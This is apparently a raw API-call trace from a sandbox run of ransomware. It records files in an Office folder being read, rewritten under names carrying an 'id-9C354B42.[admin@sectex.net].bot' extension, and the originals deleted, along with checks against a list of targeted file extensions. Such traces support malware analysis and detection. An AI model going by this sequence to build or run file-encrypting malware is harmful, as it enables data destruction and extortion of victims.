	[0153.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS") returned 68
	[0153.321] lstrlenW (lpString=".1cd") returned 4
	[0153.321] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0153.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET.HXS") returned 68
	[0153.321] lstrlenW (lpString=".jpg") returned 4
	[0153.321] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0153.321] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0153.322] lstrlenW (lpString="VISWEB.VSL") returned 10
	[0153.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visweb.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0153.322] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=68488) returned 1
	[0153.322] CloseHandle (hObject=0x25c) returned 1
	[0153.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visweb.vsl")) returned 0x20
	[0153.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visweb.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visweb.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0153.323] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.323] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.323] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visweb.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0153.323] GetLastError () returned 0x0
	[0153.323] ReadFile (in: hFile=0x25c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x10b88, lpOverlapped=0x0) returned 1
	[0153.514] WriteFile (in: hFile=0x3f8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x10b90, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x10b90, lpOverlapped=0x0) returned 1
	[0153.515] ReadFile (in: hFile=0x25c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.515] WriteFile (in: hFile=0x3f8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0153.515] SetEndOfFile (hFile=0x3f8) returned 1
	[0153.516] CloseHandle (hObject=0x3f8) returned 1
	[0153.516] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.516] SetEndOfFile (hFile=0x25c) returned 1
	[0153.519] CloseHandle (hObject=0x25c) returned 1
	[0153.519] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.532] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visweb.vsl")) returned 1
	[0153.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL") returned 58
	[0153.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL") returned 58
	[0153.533] lstrlenW (lpString=".doc") returned 4
	[0153.533] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0153.533] lstrlenW (lpString=".docx") returned 5
	[0153.533] lstrcmpiW (lpString1=".docx", lpString2="B.VSL") returned -1
	[0153.533] lstrlenW (lpString=".pdf") returned 4
	[0153.533] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0153.533] lstrlenW (lpString=".xls") returned 4
	[0153.533] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0153.533] lstrlenW (lpString=".xlsx") returned 5
	[0153.533] lstrcmpiW (lpString1=".xlsx", lpString2="B.VSL") returned -1
	[0153.533] lstrlenW (lpString=".ppt") returned 4
	[0153.533] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0153.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL") returned 58
	[0153.533] lstrlenW (lpString=".zip") returned 4
	[0153.533] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0153.533] lstrlenW (lpString=".rar") returned 4
	[0153.533] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0153.534] lstrlenW (lpString=".bz2") returned 4
	[0153.534] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0153.534] lstrlenW (lpString=".7z") returned 3
	[0153.534] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0153.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL") returned 58
	[0153.534] lstrlenW (lpString=".dbf") returned 4
	[0153.534] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0153.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL") returned 58
	[0153.534] lstrlenW (lpString=".1cd") returned 4
	[0153.534] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0153.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL") returned 58
	[0153.534] lstrlenW (lpString=".jpg") returned 4
	[0153.534] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0153.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL") returned 58
	[0153.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL") returned 58
	[0153.534] lstrlenW (lpString=".doc") returned 4
	[0153.534] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0153.534] lstrlenW (lpString=".docx") returned 5
	[0153.534] lstrcmpiW (lpString1=".docx", lpString2="B.VSL") returned -1
	[0153.534] lstrlenW (lpString=".pdf") returned 4
	[0153.534] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0153.534] lstrlenW (lpString=".xls") returned 4
	[0153.534] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0153.534] lstrlenW (lpString=".xlsx") returned 5
	[0153.534] lstrcmpiW (lpString1=".xlsx", lpString2="B.VSL") returned -1
	[0153.534] lstrlenW (lpString=".ppt") returned 4
	[0153.534] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0153.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL") returned 58
	[0153.534] lstrlenW (lpString=".zip") returned 4
	[0153.534] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0153.534] lstrlenW (lpString=".rar") returned 4
	[0153.535] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0153.535] lstrlenW (lpString=".bz2") returned 4
	[0153.535] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0153.535] lstrlenW (lpString=".7z") returned 3
	[0153.535] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0153.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL") returned 58
	[0153.535] lstrlenW (lpString=".dbf") returned 4
	[0153.535] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0153.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL") returned 58
	[0153.535] lstrlenW (lpString=".1cd") returned 4
	[0153.535] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0153.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL") returned 58
	[0153.535] lstrlenW (lpString=".jpg") returned 4
	[0153.535] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0153.535] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0153.535] lstrlenW (lpString="WINPROJ.DEV.HXS") returned 15
	[0153.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0153.556] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=4932186) returned 1
	[0153.557] CloseHandle (hObject=0x1b8) returned 1
	[0153.557] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev.hxs")) returned 0x20
	[0153.628] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.698] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0153.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS") returned 63
	[0153.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS") returned 63
	[0153.699] lstrlenW (lpString=".doc") returned 4
	[0153.699] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0153.699] lstrlenW (lpString=".docx") returned 5
	[0153.699] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0153.699] lstrlenW (lpString=".pdf") returned 4
	[0153.699] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0153.699] lstrlenW (lpString=".xls") returned 4
	[0153.699] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0153.699] lstrlenW (lpString=".xlsx") returned 5
	[0153.699] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0153.699] lstrlenW (lpString=".ppt") returned 4
	[0153.699] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0153.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS") returned 63
	[0153.699] lstrlenW (lpString=".zip") returned 4
	[0153.699] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0153.699] lstrlenW (lpString=".rar") returned 4
	[0153.699] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0153.699] lstrlenW (lpString=".bz2") returned 4
	[0153.699] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0153.699] lstrlenW (lpString=".7z") returned 3
	[0153.699] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0153.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS") returned 63
	[0153.699] lstrlenW (lpString=".dbf") returned 4
	[0153.699] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0153.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS") returned 63
	[0153.699] lstrlenW (lpString=".1cd") returned 4
	[0153.699] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0153.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS") returned 63
	[0153.699] lstrlenW (lpString=".jpg") returned 4
	[0153.700] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0153.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS") returned 63
	[0153.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS") returned 63
	[0153.700] lstrlenW (lpString=".doc") returned 4
	[0153.700] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0153.700] lstrlenW (lpString=".docx") returned 5
	[0153.700] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0153.700] lstrlenW (lpString=".pdf") returned 4
	[0153.700] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0153.700] lstrlenW (lpString=".xls") returned 4
	[0153.700] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0153.700] lstrlenW (lpString=".xlsx") returned 5
	[0153.700] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0153.700] lstrlenW (lpString=".ppt") returned 4
	[0153.700] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0153.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS") returned 63
	[0153.700] lstrlenW (lpString=".zip") returned 4
	[0153.700] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0153.700] lstrlenW (lpString=".rar") returned 4
	[0153.700] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0153.700] lstrlenW (lpString=".bz2") returned 4
	[0153.700] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0153.700] lstrlenW (lpString=".7z") returned 3
	[0153.700] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0153.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS") returned 63
	[0153.700] lstrlenW (lpString=".dbf") returned 4
	[0153.700] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0153.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS") returned 63
	[0153.700] lstrlenW (lpString=".1cd") returned 4
	[0153.700] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0153.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS") returned 63
	[0153.700] lstrlenW (lpString=".jpg") returned 4
	[0153.701] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0153.701] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0153.701] lstrlenW (lpString="WINPROJ_COL.HXT") returned 15
	[0153.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.810] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=207) returned 1
	[0153.810] CloseHandle (hObject=0x3e8) returned 1
	[0153.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxt")) returned 0x20
	[0153.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.810] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.810] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0153.811] GetLastError () returned 0x0
	[0153.811] ReadFile (in: hFile=0x3e8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xcf, lpOverlapped=0x0) returned 1
	[0153.812] WriteFile (in: hFile=0x31c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xd0, lpOverlapped=0x0) returned 1
	[0153.813] ReadFile (in: hFile=0x3e8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.813] WriteFile (in: hFile=0x31c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0153.813] SetEndOfFile (hFile=0x31c) returned 1
	[0153.813] CloseHandle (hObject=0x31c) returned 1
	[0153.813] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.813] SetEndOfFile (hFile=0x3e8) returned 1
	[0153.816] CloseHandle (hObject=0x3e8) returned 1
	[0153.816] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.816] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxt")) returned 1
	[0153.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT") returned 63
	[0153.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT") returned 63
	[0153.817] lstrlenW (lpString=".doc") returned 4
	[0153.817] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0153.817] lstrlenW (lpString=".docx") returned 5
	[0153.817] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0153.817] lstrlenW (lpString=".pdf") returned 4
	[0153.817] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0153.817] lstrlenW (lpString=".xls") returned 4
	[0153.817] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0153.817] lstrlenW (lpString=".xlsx") returned 5
	[0153.817] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0153.817] lstrlenW (lpString=".ppt") returned 4
	[0153.817] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0153.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT") returned 63
	[0153.817] lstrlenW (lpString=".zip") returned 4
	[0153.817] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0153.817] lstrlenW (lpString=".rar") returned 4
	[0153.817] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0153.817] lstrlenW (lpString=".bz2") returned 4
	[0153.817] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0153.817] lstrlenW (lpString=".7z") returned 3
	[0153.817] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0153.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT") returned 63
	[0153.818] lstrlenW (lpString=".dbf") returned 4
	[0153.818] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0153.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT") returned 63
	[0153.818] lstrlenW (lpString=".1cd") returned 4
	[0153.818] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0153.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT") returned 63
	[0153.818] lstrlenW (lpString=".jpg") returned 4
	[0153.818] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0153.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT") returned 63
	[0153.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT") returned 63
	[0153.818] lstrlenW (lpString=".doc") returned 4
	[0153.818] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0153.818] lstrlenW (lpString=".docx") returned 5
	[0153.818] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0153.818] lstrlenW (lpString=".pdf") returned 4
	[0153.818] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0153.818] lstrlenW (lpString=".xls") returned 4
	[0153.818] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0153.818] lstrlenW (lpString=".xlsx") returned 5
	[0153.818] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0153.818] lstrlenW (lpString=".ppt") returned 4
	[0153.818] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0153.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT") returned 63
	[0153.818] lstrlenW (lpString=".zip") returned 4
	[0153.818] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0153.818] lstrlenW (lpString=".rar") returned 4
	[0153.818] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0153.818] lstrlenW (lpString=".bz2") returned 4
	[0153.818] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0153.818] lstrlenW (lpString=".7z") returned 3
	[0153.819] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0153.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT") returned 63
	[0153.819] lstrlenW (lpString=".dbf") returned 4
	[0153.819] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0153.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT") returned 63
	[0153.819] lstrlenW (lpString=".1cd") returned 4
	[0153.819] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0153.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT") returned 63
	[0153.819] lstrlenW (lpString=".jpg") returned 4
	[0153.819] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0153.819] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0153.819] lstrlenW (lpString="WINWORD.HXS") returned 11
	[0153.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.820] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=5240293) returned 1
	[0153.820] CloseHandle (hObject=0x3e8) returned 1
	[0153.820] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.hxs")) returned 0x20
	[0153.820] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.820] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0153.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS") returned 59
	[0153.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS") returned 59
	[0153.820] lstrlenW (lpString=".doc") returned 4
	[0153.820] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0153.820] lstrlenW (lpString=".docx") returned 5
	[0153.820] lstrcmpiW (lpString1=".docx", lpString2="D.HXS") returned -1
	[0153.820] lstrlenW (lpString=".pdf") returned 4
	[0153.820] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0153.820] lstrlenW (lpString=".xls") returned 4
	[0153.820] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0153.820] lstrlenW (lpString=".xlsx") returned 5
	[0153.820] lstrcmpiW (lpString1=".xlsx", lpString2="D.HXS") returned -1
	[0153.820] lstrlenW (lpString=".ppt") returned 4
	[0153.820] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0153.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS") returned 59
	[0153.820] lstrlenW (lpString=".zip") returned 4
	[0153.821] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0153.821] lstrlenW (lpString=".rar") returned 4
